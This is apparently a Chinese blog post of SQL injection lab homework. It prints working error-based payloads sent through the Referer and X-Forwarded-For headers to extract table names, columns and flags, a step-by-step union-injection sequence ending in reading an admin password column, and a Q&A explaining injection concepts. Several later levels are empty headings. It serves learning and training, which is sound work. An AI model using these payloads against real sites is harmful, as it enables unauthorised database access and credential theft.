<h3 id="pass-08"><a href="#pass-08" class="headerlink" title="pass-08"></a>pass-08</h3><p>Head注入（二）</p>
<p>解题思路</p>
<p>referer全部替换为：</p>
<h4 id="库名"><a href="#库名" class="headerlink" title="库名"></a>库名</h4><h4 id="表名-1"><a href="#表名-1" class="headerlink" title="表名"></a>表名</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or updatexml(1,concat(&#x27;!&#x27;,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),1),123) -- qwe</span><br></pre></td></tr></table></figure>

<p>flag_head,ip,refer,uagent,user</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201210850727.png" alt="image-20211201210850727"></p>
<h4 id="记录-1"><a href="#记录-1" class="headerlink" title="记录"></a>记录</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or updatexml(1,concat(&#x27;!&#x27;,(select group_concat(flag_h1) from flag_head)),1),123) -- qwe</span><br></pre></td></tr></table></figure>

<p>zKaQ-YourHd,zKaQ-Refer,zKaQ-ipi</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201211728009.png" alt="image-20211201211728009"></p>
<h4 id="flag：-1"><a href="#flag：-1" class="headerlink" title="flag："></a>flag：</h4><p>zKaQ-Refer</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201210220092.png" alt="image-20211201210220092"></p>
<h3 id="pass-09"><a href="#pass-09" class="headerlink" title="pass-09"></a>pass-09</h3><p>Head注入（三）</p>
<p>解题思路</p>
<p>X-Forwarded-For</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: &#x27; or updatexml(11,concat(&#x27;!&#x27;,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),33) -- qwe</span><br></pre></td></tr></table></figure>

<h4 id="表名：-1"><a href="#表名：-1" class="headerlink" title="表名："></a>表名：</h4><p>flag_head</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201212540516.png" alt="image-20211201212540516"></p>
<h4 id="列名-1"><a href="#列名-1" class="headerlink" title="列名"></a>列名</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or updatexml(1,concat(&#x27;!&#x27;,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;flag_head&#x27;)),1),123) -- qwe</span><br></pre></td></tr></table></figure>

<p>Id,flag_h1</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201213052196.png" alt="image-20211201213052196"></p>
<h4 id="记录-2"><a href="#记录-2" class="headerlink" title="记录"></a>记录</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: &#x27; or updatexml(11,concat(&#x27;!&#x27;,(select flag_h1 from flag_head limit 0,1)),1),33) -- qwe</span><br><span class="line"></span><br><span class="line">注意；这关查询记录必须用limit才可以，group_concat函数查出的数据有短缺zKaQ-ipi，正确为zKaQ-ipip（坑）</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201220522779.png" alt="image-20211201220522779"></p>
<h4 id="flag"><a href="#flag" class="headerlink" title="flag:"></a>flag:</h4><p>zKaQ-ipip</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201220155520.png" alt="image-20211201220155520"></p>
<h3 id="pass-10"><a href="#pass-10" class="headerlink" title="pass-10"></a>pass-10</h3><p>布尔盲注（一）</p>
<p>解题思路</p>
<h3 id="pass-11"><a href="#pass-11" class="headerlink" title="pass-11"></a>pass-11</h3><p>布尔盲注（二）</p>
<p>解题思路</p>
<h3 id="pass-12"><a href="#pass-12" class="headerlink" title="pass-12"></a>pass-12</h3><p>布尔注入（三）</p>
<p>解题思路</p>
<h3 id="pass-13"><a href="#pass-13" class="headerlink" title="pass-13"></a>pass-13</h3><p>延时注入（一）</p>
<p>解题思路</p>
<h3 id="pass-14"><a href="#pass-14" class="headerlink" title="pass-14"></a>pass-14</h3><p>延时注入（二）</p>
<p>解题思路</p>
<h3 id="pass-15"><a href="#pass-15" class="headerlink" title="pass-15"></a>pass-15</h3><p>宽字节注入（一）</p>
<p>解题思路</p>
<h3 id="pass-16"><a href="#pass-16" class="headerlink" title="pass-16"></a>pass-16</h3><p>宽字节注入（二）</p>
<p>解题思路</p>
<h3 id="pass-17"><a href="#pass-17" class="headerlink" title="pass-17"></a>pass-17</h3><p>宽字节注入（三）</p>
<p>解题思路</p>
<h2 id="注入原理分析"><a href="#注入原理分析" class="headerlink" title="注入原理分析"></a>注入原理分析</h2><h3 id="1、介绍sql注入的原理"><a href="#1、介绍sql注入的原理" class="headerlink" title="1、介绍sql注入的原理"></a>1、介绍sql注入的原理</h3><p>SQL注入是网站存在最多也是比较简单的漏洞，主要原因是程序对用户输入的字符串没有进行过滤或处理不严谨，导致用户可以通过精心构造语句来非法获取数据库中的信息，SQL注入的首次公开讨论始于1998年左右，至今已有20多年的历史，被冠以漏洞之王的称号。</p>
<p>知道了库名就可以知道表名 知道了表面就可以知道列名</p>
<p>知道了表面和列名就可以得到表里面的记录（数据）</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204259532-16378441811501-16378441852562.png" alt="image-20211125204259532"></p>
<h3 id="2、靶场演示sql注入的基本流程"><a href="#2、靶场演示sql注入的基本流程" class="headerlink" title="2、靶场演示sql注入的基本流程"></a>2、靶场演示sql注入的基本流程</h3><p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204338972.png" alt="image-20211125204338972"></p>
<h3 id="3、讲解sql注入的中遇到的函数"><a href="#3、讲解sql注入的中遇到的函数" class="headerlink" title="3、讲解sql注入的中遇到的函数"></a>3、讲解sql注入的中遇到的函数</h3><p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204358071.png" alt="image-20211125204358071"></p>
<p>判断是否存在注入：and 1=2<br>判断字段数：order by 2<br>查询数据库：and 1=2 union select 1,database()<br>查询表名：and 1=2 union select 1,table_name from information_schema.tables where table_schema =’maoshe’<br>查询列名：and 1=2 union select 1,column_name from information_schema.columns where table_name =’admin’ limit 2,1<br>查询具体数据：and 1=2 union select 1,password from admin</p>
<hr>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204412998.png" alt="image-20211125204412998"></p>
<p>4、展示sql注入在实战中的例子</p>
<p>5、总结</p>
<h2 id="易错回答分析"><a href="#易错回答分析" class="headerlink" title="易错回答分析"></a>易错回答分析</h2><p>1.sql注入本质是什么</p>
<p>把用户输入当做代码执行</p>
<p>2.sql注入的条件</p>
<p>用户可控输入和原本程序要执行代码，拼接用户输入且当作SQL语句去执行</p>
<p>3.order by的作用及含义</p>
<p>order by 用于判断显示位，order by 原有的作用是对字段进行一个排序，在sql注入中用order by 来判断排序，order by 1就是对一个字段进行排序，如果一共四个字段，你order by 5 数据库不知道怎么排序，于是乎就错误了无返回值</p>
<p>4.union select如何发挥作用</p>
<p>union为联合查询，a联合b进行了查询，为查询了前面的sql语句(原有的)后再进行后面的sq查询(我们添加的)，但两张表联合查询的字段数必须相同。</p>
<p>5.输出位是什么</p>
<p>SQL查询出来的数据不一定全部会输出，页面上只会输出几个字段的信息，那几个会输出的字段就是输出位</p>
<p>6.information_schema是什么</p>
<p>information_schema是mysql的系统自带表，用于查询数据，在mysql5.0以上版本中存在</p>
<p>7.加单引号和加 and 1=2有什么区别</p>
<p>有区别，单引号是为了闭合语句，而and 1=2是为了让union前面的语句无查询结果无输出，然后直接输出拼接进去union后面的那个语句的查询结果</p>
<p>\8. and 是什么意思</p>
<p>and 为和的意思，一个语句中，当前一个正确，后一个错误时，如果是and连接整个语句返回是False</p>
<p>9.or是什么意思</p>
<p>Or 为和的意思，一个语句中，当前一个正确，后一个错误时，如果是or连接整个语句返回是True</p>
<p>10.and 和 or 选择使用有什么讲究？</p>
<p> And 语句执行时，如果and 前的语句返回False,那么and后面的语句根本不执行</p>
<p>11.除了单引号外还有其他的符号可以闭合吗？</p>
<p>实际上还是要看源码，常见的是单引号和双引号还有括号</p>
<p>12.limit的作用</p>
<p>limit 在注入中用于排序然后输出，limit a,b a代表了从哪个位置(从0开始) b代表从那位开始显示几条数据</p>
<p>13.可以查讯多个字段内容吗</p>
<p>可以，可以使用语句Group_concat()函数进行输出</p>
<p>14.%23有什么作用</p>
<p>%23编码为#,用于注释后面的语句,防止SQL注入点后原本的SQL语句对SQL注入进行干扰</p>
<p>15.报错注入的原理</p>
<p>利用sql注入拼接sql语句，将报错信息输出时同时将我们想要的信息输出</p>
<p>16.闭合是什么</p>
<p>在sql查询中，代码比较严谨，括号和引号都得成双成对，引号内的默认是字符串不会当作SQL语句执行，所以必须闭合然后才能注入，当然有些SQL语句直接拼接，也就不用什么闭合了</p>
<p>17.SQL注入有数据库限制吗？</p>
<p>没有，常见的数据库都可以</p>
<p>18.SQL注入有动态脚本语言限制吗？</p>
<p>没有限制</p>
<p>19.SQL注入如果没系统自带表怎么办</p>
<p>那就惨了，只能通过猜，不断的尝试，一般而言数据库的表也不会乱起名字，毕竟是团队协作的东西</p>
<p>20.系统自带库管理员不会修改吗？</p>
<p>一般而言并不会</p>
<p>21.union all 和 union 区别</p>
<p>如果输出的数据有相同的，Union只会输出一次，而union all都会输出</p>
<p>22.为什么用and 1=1正常 and 1=2报错来判断是否存在SQL注入</p>
<p>因为如果存在SQL注入，那么and就是和的意思，1=1是一个恒等式，然后因为原本能够查出数据，那么两个真就是True，但是1=2肯定是不可能的，这里就会返回一个False,然后因为和必须两个真才返回True,所以这里拼接就不成立返回False.</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/11/25/hacking/" rel="prev" title="hacking">
                  <i class="fa fa-chevron-left"></i> hacking
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/11/26/%E6%8E%8C%E6%8E%A7%E5%AE%89%E5%85%A8/1.%E8%AF%BE%E5%A0%82%E7%BB%83%E4%B9%A0/%E5%90%8E%E7%AB%AF%E5%9F%BA%E7%A1%80php1/" rel="next" title="后端基础php1">
                  后端基础php1 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
